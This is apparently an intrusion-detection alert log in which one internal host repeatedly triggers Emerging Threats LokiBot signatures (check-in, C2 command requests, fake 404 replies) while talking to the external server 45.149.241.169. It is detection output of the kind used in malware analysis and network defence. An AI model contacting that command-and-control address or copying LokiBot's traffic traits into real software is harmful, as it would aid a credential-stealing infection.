2024-10-03T09:22:07.060441+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:07.060441+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:07.070496+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64408	TCP
2024-10-03T09:22:07.225458+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:07.225458+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:07.225458+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:07.996431+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:07.996431+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64409	45.149.241.169	80	TCP
2024-10-03T09:22:08.024007+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64409	TCP
2024-10-03T09:22:08.313595+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:08.313595+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:08.313595+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:09.068231+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:09.068231+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64410	45.149.241.169	80	TCP
2024-10-03T09:22:09.073052+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64410	TCP
2024-10-03T09:22:09.230403+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:09.230403+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:09.230403+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:10.004080+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:10.004080+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64411	45.149.241.169	80	TCP
2024-10-03T09:22:10.010284+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64411	TCP
2024-10-03T09:22:10.331436+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:10.331436+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:10.331436+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:11.079290+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:11.079290+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64412	45.149.241.169	80	TCP
2024-10-03T09:22:11.084543+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64412	TCP
2024-10-03T09:22:11.239806+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:11.239806+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:11.239806+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.003792+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.003792+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64413	45.149.241.169	80	TCP
2024-10-03T09:22:12.009694+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64413	TCP
2024-10-03T09:22:12.172123+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:12.172123+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:12.172123+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:12.893575+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:12.893575+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64414	45.149.241.169	80	TCP
2024-10-03T09:22:12.898558+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64414	TCP
2024-10-03T09:22:13.068985+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:13.068985+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:13.068985+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:13.853371+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:13.853371+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64415	45.149.241.169	80	TCP
2024-10-03T09:22:13.862095+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64415	TCP
2024-10-03T09:22:14.008975+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.008975+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.008975+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.776328+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.776328+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64416	45.149.241.169	80	TCP
2024-10-03T09:22:14.782651+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64416	TCP
2024-10-03T09:22:14.936067+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:14.936067+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:14.936067+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:15.764134+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:15.764134+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64417	45.149.241.169	80	TCP
2024-10-03T09:22:15.769373+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64417	TCP
2024-10-03T09:22:15.929179+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:15.929179+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:15.929179+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:16.667875+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:16.667875+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64418	45.149.241.169	80	TCP
2024-10-03T09:22:16.672757+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64418	TCP
2024-10-03T09:22:16.827330+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:16.827330+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:16.827330+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:17.525911+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:17.525911+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64419	45.149.241.169	80	TCP
2024-10-03T09:22:17.541317+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64419	TCP
2024-10-03T09:22:17.703674+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:17.703674+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:17.703674+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:18.555021+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:18.555021+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64420	45.149.241.169	80	TCP
2024-10-03T09:22:18.559915+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64420	TCP
2024-10-03T09:22:18.714301+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:18.714301+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:18.714301+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:19.379297+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:19.379297+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64421	45.149.241.169	80	TCP
2024-10-03T09:22:19.384819+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64421	TCP
2024-10-03T09:22:19.547744+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:19.547744+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:19.547744+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:20.358626+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:20.358626+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64422	45.149.241.169	80	TCP
2024-10-03T09:22:20.373252+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64422	TCP
2024-10-03T09:22:20.566222+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:20.566222+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:20.566222+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:21.203422+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:21.203422+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64423	45.149.241.169	80	TCP
2024-10-03T09:22:21.208335+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64423	TCP
2024-10-03T09:22:21.356699+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:21.356699+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:21.356699+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.048862+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.048862+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64424	45.149.241.169	80	TCP
2024-10-03T09:22:22.053825+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64424	TCP
2024-10-03T09:22:22.220181+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:22.220181+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:22.220181+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:22.910892+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:22.910892+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64425	45.149.241.169	80	TCP
2024-10-03T09:22:23.004091+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64425	TCP
2024-10-03T09:22:23.369318+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:23.369318+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:23.369318+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:23.931318+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:23.931318+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64426	45.149.241.169	80	TCP
2024-10-03T09:22:23.936122+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64426	TCP
2024-10-03T09:22:24.106031+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.106031+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.106031+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.748653+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.748653+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64427	45.149.241.169	80	TCP
2024-10-03T09:22:24.754606+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64427	TCP
2024-10-03T09:22:24.910667+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:24.910667+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:24.910667+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:25.639024+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:25.639024+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64428	45.149.241.169	80	TCP
2024-10-03T09:22:25.644791+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64428	TCP
2024-10-03T09:22:25.816016+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:25.816016+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:25.816016+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:26.473248+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:26.473248+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64429	45.149.241.169	80	TCP
2024-10-03T09:22:26.484271+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64429	TCP
2024-10-03T09:22:26.659850+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:26.659850+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:26.659850+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:27.331889+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:27.331889+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64430	45.149.241.169	80	TCP
2024-10-03T09:22:27.336837+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64430	TCP
2024-10-03T09:22:27.504132+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:27.504132+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:27.504132+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:28.156424+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:28.156424+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64431	45.149.241.169	80	TCP
2024-10-03T09:22:28.161528+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64431	TCP
2024-10-03T09:22:28.311778+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:28.311778+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:28.311778+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:29.195837+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:29.195837+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64432	45.149.241.169	80	TCP
2024-10-03T09:22:29.297417+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64432	TCP
2024-10-03T09:22:29.639445+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:29.639445+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:29.639445+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:30.480234+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:30.480234+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64433	45.149.241.169	80	TCP
2024-10-03T09:22:30.485332+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64433	TCP
2024-10-03T09:22:30.646052+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:30.646052+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:30.646052+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:31.486447+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:31.486447+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64434	45.149.241.169	80	TCP
2024-10-03T09:22:31.491241+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64434	TCP
2024-10-03T09:22:31.674682+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:31.674682+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:31.674682+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:32.303507+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:32.303507+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64435	45.149.241.169	80	TCP
2024-10-03T09:22:32.311823+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64435	TCP
2024-10-03T09:22:32.502916+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:32.502916+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:32.502916+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:33.188157+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:33.188157+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64436	45.149.241.169	80	TCP
2024-10-03T09:22:33.193006+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64436	TCP
2024-10-03T09:22:33.340490+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:33.340490+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:33.340490+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:34.292855+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:34.292855+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64437	45.149.241.169	80	TCP
2024-10-03T09:22:34.448158+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:34.448158+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:34.448158+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.079411+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.079411+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64438	45.149.241.169	80	TCP
2024-10-03T09:22:35.085142+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64438	TCP
2024-10-03T09:22:35.225001+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:35.225001+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:35.225001+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:35.848697+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:35.848697+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64439	45.149.241.169	80	TCP
2024-10-03T09:22:35.853534+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64439	TCP
2024-10-03T09:22:36.015476+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.015476+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.015476+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.750157+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.750157+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64440	45.149.241.169	80	TCP
2024-10-03T09:22:36.755143+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64440	TCP
2024-10-03T09:22:36.917140+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:36.917140+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:36.917140+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:37.777548+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:37.777548+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64441	45.149.241.169	80	TCP
2024-10-03T09:22:37.782566+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64441	TCP
2024-10-03T09:22:37.931400+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:37.931400+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:37.931400+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64442	45.149.241.169	80	TCP
